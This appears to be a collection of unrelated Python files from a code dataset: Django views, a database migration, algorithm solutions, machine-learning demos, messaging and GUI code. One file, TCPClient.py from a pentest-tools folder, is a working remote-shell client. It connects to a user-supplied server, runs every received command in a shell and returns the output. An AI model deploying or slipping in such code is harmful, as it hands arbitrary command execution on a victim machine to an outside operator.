TEXT\nfrom whoosh.query import *\n\nspecialchars = ['(', ')', '^',':','\"', '{', '}', '[', ']']\n\ndef sanitize(query):\n if query:\n for x in specialchars:\n query = query.replace(x, '')\n query = query.strip()\n return query\n\ndef __getUserDetails__(request):\n if (request.POST.get('username', '') == '' or request.POST.get('password', '') == ''):\n return None\n\n return User(username = request.POST.get('username', ''), password = request.POST.get('password', ''))\n\ndef home(request):\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n\ndef about(request):\n return render_to_response('aboutus.html', {}, context_instance=RequestContext(request))\n\ndef contact(request):\n return render_to_response('contactus.html', {}, context_instance=RequestContext(request))\n\ndef abbreviations(request):\n return render_to_response('abbreviations.html', {}, context_instance=RequestContext(request))\n\ndef login(request):\n #import pdb; pdb.set_trace()\n UserDetails = __getUserDetails__(request)\n if not UserDetails:\n #This is not a POST request. Check whether we are already logged-in\n if request.user and request.user.is_authenticated():\n #User is already logged-in\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n else:\n return render_to_response('login.html', {}, context_instance=RequestContext(request))\n else:\n #User is trying to log-in\n user = auth.authenticate(username = UserDetails.username, password = UserDetails.password)\n if user is not None:\n auth.login(request, user)\n return render_to_response('index.html', {}, context_instance=RequestContext(request))\n else:\n return render_to_response('login.html', {'msg': 'Invalid username/password'}, context_instance=RequestContext(request));\n\ndef logout(request):\n auth.logout(request)\n return HttpResponseRedirect(\"/home/\")\n\n@login_required\ndef editentry(request):\n id = request.GET.get('id', '')\n if id == '':\n return render_to_response('editdata.html', {'mode':'Create'}, context_instance=RequestContext(request));\n else:\n index = open_dir(settings.INDEX_PATH)\n srch = index.searcher()\n parser = QueryParser('id', schema=index.schema)\n qry = parser.parse(id)\n results = srch.search(qry)\n if len(results) > 0:\n return render_to_response('editdata.html', {'mode':'Update', 'result':results[0]}, context_instance=RequestContext(request));\n else:\n return render_to_response('editdata.html', {'mode':'Update'}, context_instance=RequestContext(request));\n\n@login_required\ndef saveentry(request):\n id = request.POST.get('id', '')\n key_ta = request.POST.get('key-ta', '')\n key_en = request.POST.get('key-en', '')\n content = request.POST.get('context', '')\n\n if key_ta != '' and content != '':\n if id != '':\n entry = Entry(id, unicode(key_ta), key_en, unicode(content))\n else:\n entry = Entry.objects.create()\n entry.key_ta = unicode(key_ta)\n entry.key_en = key_en\n entry.entry = unicode(content)\n entry.save()\n return render_to_response('index.html', {'msg':'Saved successfully'}, context_instance=RequestContext(request));\n \n\n@login_required\ndef deleteentry(request):\n id = request.GET.get('id', '')\n msg = ''\n if id != '':\n entries = Entry.objects.filter(id=id)\n if entries and len(entries) > 0:\n for entry in entries:\n entry.delete()\n msg = 'Deleted successfully'\n else:\n msg = 'Could not find entry to delete'\n else:\n msg = 'No record passed for delete'\n return render_to_response('index.html', {'msg':msg}, 
context_instance=RequestContext(request));\n\n\ndef search(request):\n finalresult = []\n query = request.POST.get('transliterate', None)\n if query:\n query = sanitize(query)\n index = open_dir(settings.INDEX_PATH)\n srch = index.searcher()\n parser = MultifieldParser(['key_ta', 'key_en', 'content'],\n schema=index.schema)\n qry = parser.parse(query)\n results = srch.search(qry)\n for res in results:\n if res['key_ta'] and res['content']:\n key = res['key_ta']\n if res['key_en']:\n key = key + \" (\" + res['key_en'] + \")\"\n \n finalresult.append({'id':res['id'], 'key':key, 'content':res['content'].encode('utf-8')})\n\n return render_to_response('index.html', {'result': finalresult, 'searchword': query, \\\n 'totalres': len(finalresult)}, context_instance=RequestContext(request))\n\ndef letterSearch(request):\n finalresult = []\n query = request.GET.get('letter', None)\n if query:\n query = sanitize(query)\n index = open_dir(settings.INDEX_PATH)\n srch = index.searcher()\n parser = QueryParser('key_ta', schema=index.schema)\n qry = parser.parse(query + u'*')\n results = srch.search(qry, sortedby=\"key_ta\")\n for res in results:\n if res['key_ta'] and res['content'] and res['key_ta'].startswith(query):\n key = res['key_ta']\n if res['key_en']:\n key = key + \" (\" + res['key_en'] + \")\"\n \n finalresult.append({'id':res['id'], 'key':key, 'content':res['content'].encode('utf-8')})\n \n return render_to_response('index.html', {'result': finalresult, 'searchword': query, 'totalres': len(finalresult)},\\\n context_instance=RequestContext(request))\n","sub_path":"Tamilkaaviyathedal1.2.1/tamilthedal/encyclopedia/tamilthedal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"471948070","text":"\"\"\"empty message\n\nRevision ID: 16a84fe1ab0d\nRevises: 5490f013b39c\nCreate Date: 2017-09-05 18:22:08.189265\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '16a84fe1ab0d'\ndown_revision = '5490f013b39c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('records', sa.Column(\n 'error', sa.String(length=64), nullable=True))\n op.add_column('records', sa.Column('success', sa.Boolean(), nullable=True))\n # op.drop_column('records', 'result')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n # op.add_column('records', sa.Column('result', sa.BOOLEAN(), nullable=True))\n op.drop_column('records', 'success')\n op.drop_column('records', 'error')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/16a84fe1ab0d_.py","file_name":"16a84fe1ab0d_.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"340092652","text":"\"\"\"\n1190. Reverse Substrings Between Each Pair of Parentheses\n\nYou are given a string s that consists of lower case English letters and brackets. 
\n\nReverse the strings in each pair of matching parentheses, starting from the innermost one.\n\nYour result should not contain any brackets.\n\n \n\nExample 1:\n\nInput: s = \"(abcd)\"\nOutput: \"dcba\"\nExample 2:\n\nInput: s = \"(u(love)i)\"\nOutput: \"iloveu\"\nExplanation: The substring \"love\" is reversed first, then the whole string is reversed.\nExample 3:\n\nInput: s = \"(ed(et(oc))el)\"\nOutput: \"leetcode\"\nExplanation: First, we reverse the substring \"oc\", then \"etco\", and finally, the whole string.\nExample 4:\n\nInput: s = \"a(bcdefghijkl(mno)p)q\"\nOutput: \"apmnolkjihgfedcbq\"\n \n\nConstraints:\n\n0 <= s.length <= 2000\ns only contains lower case English characters and parentheses.\nIt's guaranteed that all parentheses are balanced.\n\"\"\"\n\n\nclass ReverseParentheses:\n\n \"\"\"\n Solution 1: Brute Force\n Here is the brute force solution, which seems really easy to write.\n Nothing more to talk about.\n\n Time O(N^2), Space O(N)\n \"\"\"\n def doit_(self, s):\n res = ['']\n for c in s:\n if c == '(':\n res.append('')\n elif c == ')':\n res[len(res) - 2] += res.pop()[::-1]\n else:\n res[-1] += c\n return \"\".join(res)\n\n \"\"\"\n Solution 2: Wormholes\n Intuition\n Nice. I got a green accpeted with solution 1.\n Now before move on, let us check the solutions in the discuss.\n\n Hey hey hey wait, ALL solutions are BRUTE FORCE ?\n Hmmmm... why not O(N)?\n\n Fine fine fine, here comes an easy O(N) solution.\n\n Explanation\n In the first pass,\n use a stack to find all paired parentheses,\n I assume you can do this.\n\n Now just imgine that all parentheses are wormholes.\n As you can see in the diagram,\n the paired parentheses are connected to each other.\n\n image\n\n First it follows the left green arrrow,\n go into the left wormhole and get out from the right wormhole.\n Then it iterates the whole content between parentheses.\n Finally it follows the right arrow,\n go into the left wormhole,\n get out from the right wormhole and finish the whole trip.\n\n So in the second pass of our solution,\n it traverses through the paired parentheses\n and generate the result string res.\n\n i is the index of current position.\n d is the direction of traversing.\n\n\n Complexity\n Time O(N) for two passes\n Space O(N)\n\n \"\"\"\n def doit_stack_parenthesis(self, s: str) -> str:\n opened = []\n pair = {}\n for i, c in enumerate(s):\n if c == '(':\n opened.append(i)\n if c == ')':\n j = opened.pop()\n pair[i], pair[j] = j, i\n res = []\n i, d = 0, 1\n while i < len(s):\n if s[i] in '()':\n i = pair[i]\n d = -d\n else:\n res.append(s[i])\n i += d\n return ''.join(res)","sub_path":"PythonLeetcode/leetcodeM/1190_ReverseSubstringsBetweenEachPairofParentheses.py","file_name":"1190_ReverseSubstringsBetweenEachPairofParentheses.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"369565737","text":"import mercadopago\n\n# from database.firestore import get_product\nsdk = mercadopago.SDK(\"\")\n\n\nasync def status_order(data):\n data[\"transaction_amount\"] = data[\"transactionAmount\"]\n data.pop(\"transactionAmount\")\n data[\"issuer_id\"] = data[\"issuerId\"]\n data.pop(\"issuerId\")\n data[\"payment_method_id\"] = data[\"paymentMethodId\"]\n data.pop(\"paymentMethodId\")\n payment_response = sdk.payment().create(data)\n return 
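# Quick verification of both implementations above against the documented
# examples (sketch; run inside this module, nothing is assumed beyond the
# ReverseParentheses class defined here).
if __name__ == '__main__':
    solver = ReverseParentheses()
    cases = [('(abcd)', 'dcba'), ('(u(love)i)', 'iloveu'),
             ('(ed(et(oc))el)', 'leetcode'),
             ('a(bcdefghijkl(mno)p)q', 'apmnolkjihgfedcbq')]
    for s, want in cases:
        assert solver.doit_(s) == want                   # O(N^2) stack of strings
        assert solver.doit_stack_parenthesis(s) == want  # O(N) wormhole traversal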
payment_response[\"response\"]\n","sub_path":"services/mercado_pago.py","file_name":"mercado_pago.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"597012601","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n支持向量机(SVM)算法,线性可区分\n\"\"\"\nimport numpy as np\nimport pylab as pl\nfrom sklearn import svm\n\n# seed值为0,第一次随机产生的数,以后再重新运行程序不在变化,值为1,则每次重新运行都产生新的数值\nnp.random.seed(0)\n\n# 随机产生支持向量,20行两列\nx = np.r_[np.random.randn(20, 2) - [2, 2], np.random.randn(20, 2) + [2, 2]]\ny = [0] * 20 + [1] * 20 # 标记的定义\n\n# 创建分类器\nclf = svm.SVC(kernel='linear')\n\n# 建模、\nclf.fit(x, y)\n\n# get the separating hyperplane(w0x+w1y+w3=0)转化为-(w0/w1)x-(w3/w1)=y\nw = clf.coef_[0]\na = -w[0] / w[1] # 斜率-(w0/w1)=a\nxx = np.linspace(-5, 5)\n# clf.intercept_[0])是w3偏差(bias),即截距(intercept)\nyy = a * xx - (clf.intercept_[0]) / w[1]\n\n# plot the parallels to the separating hyperplane that pass through the\n# support vectors(求上下两条边界线)\nb = clf.support_vectors_[0]\nyy_down = a * xx + (b[1] - a * b[0])\nb = clf.support_vectors_[-1]\nyy_up = a * xx + (b[1] - a * b[0])\n\nprint(\"w: \", w)\nprint(\"a: \", a)\nprint(\"xx: \", xx)\nprint(\"yy: \", yy)\nprint(\"support_vectors_: \", clf.support_vectors_)\nprint(\"clf.coef_: \", clf.coef_)\n\n# 通过pl画图\n# plot the line, the points, and the nearest vectors to the plane\npl.plot(xx, yy, 'k-') # xx值,yy值,最后一个参数是线条的表示形式\npl.plot(xx, yy_down, 'k--')\npl.plot(xx, yy_up, 'k--')\n\n# 画出生成的40个支持向量的点,s表示点点的大小,c就是color嘛,marker就是点点的形状o,x,*><^,\n# alpha是点点的亮度\npl.scatter(\n clf.support_vectors_[:, 0],\n clf.support_vectors_[:, 1],\n s=30,\n c='red',\n marker='o',\n alpha=0.5)\npl.scatter(x[:, 0], x[:, 1], s=30, c='blue', marker='x', alpha=0.5)\n\n# axis tight是使坐标系的最大值和最小值和你的数据范围一致!\npl.axis('tight')\npl.show()\n","sub_path":"scikit_learn_study/scikit_learn5.py","file_name":"scikit_learn5.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452795274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom extensions import db\n\n\nclass Group(db.Model):\n __tablename__ = 'groups'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n name = db.Column(db.String(200), nullable=False, index=True)\n description = db.Column(db.Text)\n hosts = db.relationship('Host', backref='Group', lazy='dynamic')\n\n def __repr__(self):\n return '%s' % self.name\n\n\nclass Host(db.Model):\n __tablename__ = 'hosts'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n ip_address = db.Column(db.String(39), nullable=False, index=True)\n ip_address_alias = db.Column(db.String(200))\n port = db.Column(db.Integer, nullable=False, index=True)\n port_alias = db.Column(db.String(200))\n description = db.Column(db.Text)\n is_active = db.Column(db.Boolean, default=False)\n group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))\n\n def __repr__(self):\n return '%s:%s' % (self.ip_address, self.port)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522009195","text":"import numpy as np\r\nimport chainer\r\nfrom chainer import Variable\r\nfrom chainer import optimizers\r\nfrom chainer import Chain\r\nimport chainer.functions as F\r\nimport chainer.links as L\r\n\r\ndef toIndex(array):\r\n maxlen = max(array)+1\r\n ret_array = []\r\n for _ 
in array:\r\n index_array = [0] * maxlen\r\n index_array[_] = 1\r\n ret_array.append(index_array)\r\n return ret_array\r\n\r\nclass MyChain(chainer.Chain):\r\n def __init__(self):\r\n super(MyChain, self).__init__(\r\n l0 = L.Linear(784, 256),\r\n l1 = L.Linear(256, 64),\r\n l2 = L.Linear(64, 32),\r\n l3 = L.Linear(32, 10),\r\n )\r\n def __call__(self, x):\r\n h0 = F.relu(self.l0(x))\r\n h1 = F.relu(self.l1(h0))\r\n h2 = F.relu(self.l2(h1))\r\n h3 = F.sigmoid(self.l3(h2))\r\n return h3\r\n\r\nclass BatchArray:\r\n def __init__(self, arr_x, arr_t):\r\n self.arr_x = arr_x\r\n self.arr_t = arr_t\r\n self.length = len(arr_x)\r\n\r\n def __call__(self, batch_size=128):\r\n b = np.random.randint(0, self.length-batch_size)\r\n return self.arr_x[b:b+batch_size], self.arr_t[b:b+batch_size] \r\n\r\nmodel = MyChain()\r\noptimizer = chainer.optimizers.Adam()\r\noptimizer.setup(model)\r\n\r\ntrain, test = chainer.datasets.get_mnist()\r\nxs, ts = train._datasets # 60000\r\nts = np.array(toIndex(ts), \"float32\")\r\nbatch = BatchArray(xs, ts)\r\n\r\ntxs, tts = test._datasets # 60000\r\ntts = np.array(toIndex(tts), \"float32\")\r\nbatch_t = BatchArray(txs, tts)\r\n\r\nfor _ in range(3000):\r\n x, t = batch(256)\r\n\r\n model.cleargrads()\r\n y = model(x)\r\n loss = F.mean_squared_error(y, t)\r\n loss.backward()\r\n optimizer.update()\r\n\r\n vx, vt = batch_t(128)\r\n val_y = model(vx)\r\n val_loss = F.mean_squared_error(val_y, vt)\r\n if _ % 100 == 0:\r\n print(\"epoch:%d ---> loss:%.3f val_loss:%.3f\" % (_, loss.data, val_loss.data))","sub_path":"ml/MNIST/FNN/c_FNN.py","file_name":"c_FNN.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"540564574","text":"import json\nimport pika\n\nclass Sender(object):\n \n def __init__(self):\n self.__connection = None\n self.__channel = None\n self.__queue_name = 'MyTestQueue'\n \n def run(self):\n \"\"\"\n Send messages from keyboard until the user aborts by entering \"quit\"\n \"\"\"\n params = pika.ConnectionParameters(host='localhost')\n self.__connection = pika.AsyncoreConnection(parameters=params)\n self.__channel = self.__connection.channel()\n self.__channel.queue_declare(\n queue=self.__queue_name,\n durable=True,\n exclusive=False,\n auto_delete=False)\n \n keepGoing = True\n while keepGoing:\n i = raw_input(\"\\nEnter a message [or 'quit' to quit]\\n\")\n if i.lower() == 'quit':\n keepGoing = False\n else:\n self.__send_message(i)\n \n self.__connection.close()\n pika.asyncore_loop()\n \n def __send_message(self, message):\n \n print('Sending \"{0}\"'.format(message))\n \n message = {\n 'type': 'message',\n 'content': message\n }\n \n encoded = json.dumps(message)\n \n props = pika.BasicProperties(\n content_type='application/json',\n delivery_mode=2)\n \n self.__channel.basic_publish(\n exchange='',\n routing_key=self.__queue_name,\n body=encoded,\n properties=props,\n block_on_flow_control=True)\n\nif __name__ == '__main__':\n client = Sender()\n client.run()","sub_path":"src/1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"164100513","text":"import numpy as np\nfrom reid.utils.data import transforms as T\nfrom torch.utils.data import DataLoader\nfrom reid.utils.data.preprocessor import Preprocessor\n\n\ndef get_dataloader(dataset,data_dir,\n training=False, height=256,\n width=128, batch_size=64, workers=1):\n normalizer = 
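# A matching receiver for the Sender above, sketched against the modern
# pika 1.x blocking API (the original uses the long-removed AsyncoreConnection);
# queue name and host mirror the sender's settings.
import json
import pika

def on_message(channel, method, properties, body):
    message = json.loads(body)
    print('Received {0!r}'.format(message['content']))
    channel.basic_ack(delivery_tag=method.delivery_tag)

connection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
channel = connection.channel()
channel.queue_declare(queue='MyTestQueue', durable=True,
                      exclusive=False, auto_delete=False)
channel.basic_consume(queue='MyTestQueue', on_message_callback=on_message)
channel.start_consuming()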
T.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n if training:\n transformer = T.Compose([\n T.RandomSizedRectCrop(height, width),\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n normalizer,\n ])\n else:\n transformer = T.Compose([\n T.RectScale(height, width),\n T.ToTensor(),\n normalizer,\n ])\n data_loader = DataLoader(\n Preprocessor(dataset, root=data_dir,\n transform=transformer),\n batch_size=batch_size, num_workers=workers,\n shuffle=training, pin_memory=True, drop_last=training)\n return data_loader\n\n\ndef update_train_untrain(sel_idx,train_data,untrain_data,pred_y):\n assert len(train_data[0]) == len(untrain_data[0])\n add_data = [(untrain_data[i][0],int(pred_y[i]),untrain_data[i][2])\n for i,flag in enumerate(sel_idx) if flag]\n data1 = [untrain_data[i]\n for i,flag in enumerate(sel_idx) if not flag]\n data2 = train_data + add_data\n return data2, data1\n\n\ndef sel_idx(score,train_data,ratio=0.5):\n y = np.array([label for _,label,_ in train_data])\n add_indices = np.zeros(score.shape[0])\n clss = np.unique(y)\n assert score.shape[1] == len(clss)\n count_per_class = [sum(y == c) for c in clss]\n pred_y = np.argmax(score,axis=1)\n for cls in range(len(clss)):\n indices = np.where(pred_y == cls)[0]\n cls_score = score[indices,cls]\n idx_sort = np.argsort(cls_score)\n add_num = min(int(np.ceil(count_per_class[cls] * ratio)),\n indices.shape[0])\n add_indices[indices[idx_sort[-add_num:]]] = 1\n return add_indices.astype('bool')\n\n\ndef split_dataset(dataset,train_ratio=0.2,seed=0):\n \"\"\"\n split dataset to train_set and untrain_set\n \"\"\"\n assert 0 <= train_ratio <= 1\n train_set = []\n untrain_set = []\n np.random.seed(seed)\n pids = np.array([data[1] for data in dataset])\n clss = np.unique(pids)\n assert len(clss) == 751\n for cls in clss:\n indices = np.where(pids == cls)[0]\n np.random.shuffle(indices)\n train_num = int(np.ceil((len(indices) * train_ratio)))\n train_set += [dataset[i] for i in indices[:train_num]]\n untrain_set += [dataset[i] for i in indices[train_num:]]\n cls1 = np.unique([d[1] for d in train_set])\n cls2 = np.unique([d[1] for d in untrain_set])\n assert len(cls1) == len(cls2) and len(cls1) == 751\n return train_set,untrain_set\n","sub_path":"reid/utils/data/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"13347065","text":"\"\"\"\nПоследовательность треугольных чисел образуется путем сложения натуральных чисел. К примеру, 7-ое треугольное число равно 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28. 
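# Toy illustration of sel_idx() above (hypothetical data; the tuples mimic the
# (image, pid, camera) layout this module uses). With two balanced classes and
# ratio=0.5, the single highest-confidence prediction per class is kept.
import numpy as np
train = [('a.jpg', 0, 0), ('b.jpg', 0, 0), ('c.jpg', 1, 0), ('d.jpg', 1, 0)]
score = np.array([[0.9, 0.1], [0.6, 0.4], [0.2, 0.8], [0.45, 0.55]])
mask = sel_idx(score, train, ratio=0.5)
assert mask.tolist() == [True, False, True, False]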
Первые десять треугольных чисел:\n\n1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\n\nПеречислим делители первых семи треугольных чисел:\n\n 1: 1\n 3: 1, 3\n 6: 1, 2, 3, 6\n10: 1, 2, 5, 10\n15: 1, 3, 5, 15\n21: 1, 3, 7, 21\n28: 1, 2, 4, 7, 14, 28\nКак мы видим, 28 - первое треугольное число, у которого более пяти делителей.\n\nКаково первое треугольное число, у которого более пятисот делителей?\n\"\"\"\n\ndef dividers(n):\n import itertools as iter\n i = 2\n primfac = []\n while i * i <= n:\n while n % i == 0:\n primfac.append(i)\n n = n / i\n i = i + 1\n if n > 1:\n primfac.append(n)\n simples_uniq = list(set(primfac))\n counts = [[j for j in range(primfac.count(i) + 1)] for i in simples_uniq]\n delims = []\n for i in iter.product(*counts):\n delim = 1\n for j in range(len(i)):\n delim *= simples_uniq[j]**i[j]\n delims.append(int(delim))\n return sorted(delims)\n\ni = 2\nwhile 1:\n num = sum(range(i))\n dels_len = len(dividers(num))\n if dels_len > 500:\n print(num)\n break\n i += 1\n","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"395556533","text":"__author__ = 'garik'\n\n\nimport SparseMatrix as sm\n\ndef compare_yale_sm(A, B, tname):\n if A.elements == B.elements and A.ie == B.ie and A.jsm == B.jsm:\n print(tname + ' is ok')\n else:\n print(tname + ' is failed')\n\ndef init_A():\n M = [[0,0,0,0], [5,8,0,0], [0,0,3,0], [0,6,2,1]]\n A = sm.YaleSM()\n A.from_2d_list(M)\n return A\n# ===============testcase 1 __putitem__===============\n\nB = sm.YaleSM([1, 3], [0,2], [1, 3])\nA = init_A()\nA[1] = B\nAns = [[0,0,0,0], [0,1,0,3], [0,0,3,0], [0,6,2,1]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#1')\n\nA = init_A()\nA[2] = B\nAns = [[0,0,0,0], [5,8,0,0], [0,1,0,3], [0,6,2,1]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#2')\n\nA = init_A()\nA[3] = B\nAns = [[0,0,0,0], [5,8,0,0], [0,0,3,0], [0,1,0,3]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#3')\n\nA = init_A()\nA[-1] = B\nAns = [[0,0,0,0], [5,8,0,0], [0,0,3,0], [0,1,0,3]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#4')\n\nA = init_A()\ntry:\n A[4] = B\nexcept ValueError:\n print('#5 - value error. ok')\n\nA = init_A()\ntry:\n A[0:2] = B\nexcept ValueError:\n print('#6 - value error. ok')\n\n# ===============testcase 2 __putitem__===============\nA = init_A()\nB = sm.YaleSM([1, 3], [0,2], [1, 4])\ntry:\n A[0] = B\nexcept ValueError:\n print('#7 - value error. ok')\n\nA = init_A()\nB = [[1, 3], [0,1,2], [1, 2]]\ntry:\n A[0] = B\nexcept ValueError:\n print('#9 - value error. ok')\n\n","sub_path":"Gauss/tets/test_case_putitem.py","file_name":"test_case_putitem.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"476192130","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport socket\nimport sys\n\ndef ExecuteCommand(cmd):\n #\n return subprocess.check_output(cmd,shell=True)\n\ndef main():\n #\n print(\"[*] TCP Client [*]\")\n #\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #\n addr = input(\"[+] Server address-> \")\n #\n port = int(input(\"[+] Server port-> \"))\n #\n msg = b\"\\n[*] Connection Established [*]\\n\"\n #\n print(\"[*] Resource: %s|%s \" % (addr,port))\n #\n print(\"[*] Connecting to: %s|%s \" % (addr,port))\n #\n try:\n #\n s.connect((addr,port))\n #\n except:\n #\n print(\"[!] 
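# English restatement of the Russian docstring above: find the first triangular
# number (1, 3, 6, 10, ...) with more than 500 divisors. Alternative sketch:
# the n-th triangular number is n*(n+1)//2, and n and n+1 are coprime, so the
# divisor count factorises as d(a)*d(b); counting divisors from the prime
# factorisation (d = prod(e_i + 1)) avoids enumerating them all.
def num_divisors(n):
    count, p = 1, 2
    while p * p <= n:
        e = 0
        while n % p == 0:
            n //= p
            e += 1
        count *= e + 1
        p += 1
    return count * (2 if n > 1 else 1)   # leftover n > 1 is a single prime

def first_triangle_over(limit=500):
    n = 1
    while True:
        # split n*(n+1)//2 into two coprime factors before counting divisors
        a, b = (n // 2, n + 1) if n % 2 == 0 else (n, (n + 1) // 2)
        if num_divisors(a) * num_divisors(b) > limit:
            return n * (n + 1) // 2
        n += 1

assert first_triangle_over(5) == 28   # matches the worked example above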
Connection Failure [!]\")\n #\n sys.exit(1)\n #\n try:\n #\n print(\"[*] Sending Message [*]\")\n #\n s.send(msg)\n #\n except:\n #\n print(\"[!] Transmission Failure [!]\")\n #\n sys.exit(1)\n #\n while(True):\n #\n buffer = s.recv(1024)\n #\n result = ExecuteCommand(buffer)\n #\n s.send(result)\n #\n print(result)\n #\n s.close()\n\nif(__name__ == '__main__'):\n #\n main()\n","sub_path":"Python-Pentest-Tools/Remote-Access/Socket/TCPClient.py","file_name":"TCPClient.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16709641","text":"#! /usr/bin/env python\r\n# *-* coding: UTF-8 *-*\r\n\r\n# kytten/document.py\r\n# Copyrighted (C) 2009 by Conrad \"Lynx\" Wong\r\n# Copyrighted (C) 2013 by \"Parashurama\"\r\nfrom __future__ import unicode_literals, print_function\r\n\r\nimport pyglet\r\n\r\nfrom .widgets import Control\r\nfrom .scrollbar import VScrollbar\r\nfrom .override import KyttenIncrementalTextLayout\r\nfrom .base import string_to_unicode, iteritems\r\n\r\nclass KyttenDocumentError(Exception):pass\r\n\r\nclass Document(Control):\r\n '''\r\n Allows you to embed a document within the GUI, which includes a\r\n vertical scrollbar as needed.\r\n '''\r\n def __init__(self, document, formatted=False, width=1000, height=5000, name=None,\r\n is_fixed_size=False, always_show_scrollbar=False, text_color=None, font=None, font_size=None, group = None):\r\n '''\r\n Creates a new Document.\r\n '''\r\n Control.__init__(self, width=width, height=height, name=name, group=group)\r\n self.max_height = height\r\n self.content_width = width\r\n self.document =None\r\n\r\n if hasattr(document, 'startswith'): # document is a string\r\n self.set_document(self.create_document(document, formatted))\r\n else:\r\n self.set_document(document)\r\n\r\n self.content = None\r\n self.content_width = width\r\n self.text_color = text_color\r\n self.font_size = font_size\r\n self.font = font\r\n self.scrollbar = None\r\n self.scrollbar_to_ensure_visible=None\r\n self.set_document_style = False\r\n self.is_fixed_size = is_fixed_size\r\n self.always_show_scrollbar = always_show_scrollbar\r\n self.needs_layout = False\r\n self.link_reference={}\r\n\r\n def create_document(self, text, formatted):\r\n text = string_to_unicode(text)\r\n\r\n if not formatted: document = pyglet.text.document.UnformattedDocument(text)\r\n elif 'attr' in formatted.lower(): document = pyglet.text.decode_attributed(text)\r\n elif 'html' in formatted.lower(): document = pyglet.text.decode_html(text)\r\n\r\n else: raise TypeError('Unrecognized formattage type')\r\n\r\n self._formatting = formatted\r\n\r\n return document\r\n\r\n def set_document(self, document):\r\n if not isinstance(document, pyglet.text.document.AbstractDocument):\r\n raise TypeError('Invalid document type. 
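# Hedged sketch of the operator console this client expects on the other end,
# for loopback testing only (port 4444 and the prompt string are invented).
# It accepts one connection, prints the client's banner, then relays typed
# commands and prints whatever output the client sends back.
import socket

def serve(addr='127.0.0.1', port=4444):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((addr, port))
    srv.listen(1)
    conn, _peer = srv.accept()
    print(conn.recv(1024).decode())       # banner sent right after connect
    while True:
        cmd = input('cmd> ')
        conn.send(cmd.encode())
        print(conn.recv(4096).decode())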
Require pyglet document instance')\r\n\r\n if self.document is not None:\r\n if self.content is not None:\r\n self.content.delete()\r\n self.content = None\r\n\r\n self.document.delete_text(0, len(self.document.text))\r\n\r\n if isinstance(document, pyglet.text.document.FormattedDocument):\r\n self.isFormatted = True\r\n else:\r\n self.isFormatted =False\r\n self.set_document_style = False\r\n\r\n self.document = document\r\n self.document_type = document.__class__\r\n\r\n def _do_set_document_style(self, attr, value):\r\n length = len(self.document.text)\r\n runs = [(start, end, doc_value) for start, end, doc_value in\r\n self.document.get_style_runs(attr).ranges(0, length)\r\n if doc_value is not None]\r\n if not runs:\r\n terminator = len(self.document.text)\r\n else:\r\n terminator = runs[0][0]\r\n self.document.set_style(0, terminator, {attr: value})\r\n\r\n def _get_controls(self):\r\n controls = []\r\n if self.scrollbar:\r\n controls += self.scrollbar._get_controls()\r\n controls += Control._get_controls(self)\r\n return controls\r\n\r\n def delete(self):\r\n Control.delete(self)\r\n if self.content is not None and self.visible is False:\r\n self.content.delete()\r\n self.content = None\r\n\r\n if self.scrollbar is not None:\r\n self.scrollbar.delete()\r\n self.scrollbar = None\r\n\r\n def teardown(self):\r\n 